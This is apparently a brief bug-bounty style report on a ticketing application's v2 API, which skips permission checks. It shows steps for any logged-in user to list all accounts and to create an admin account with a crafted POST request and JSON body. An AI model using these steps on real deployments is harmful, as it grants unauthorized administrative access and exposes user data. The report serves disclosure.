There are some api v2
doesn’t check permission allow attackers to retrieve/edit information ticket
,account
,group
,department
,team
,ElasticSearch
Get users list
1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. Users list return.
Create user with admin role
1. Get the admin role id in `/api/v2/accounts`.
2. Send POST to `/api/v2/accounts`.
{"username":"test21233","fullname":"test21233","title":"test2","email":"[email protected]","teams":["627ce1fd9f59377095600ce9"],"role":"627ce1fd9f59377095600ce1","password":"test2test2","passwordConfirm":"test2test2"}
Many api endpoint get vulnerable, i just show piece of attack vector that can happen.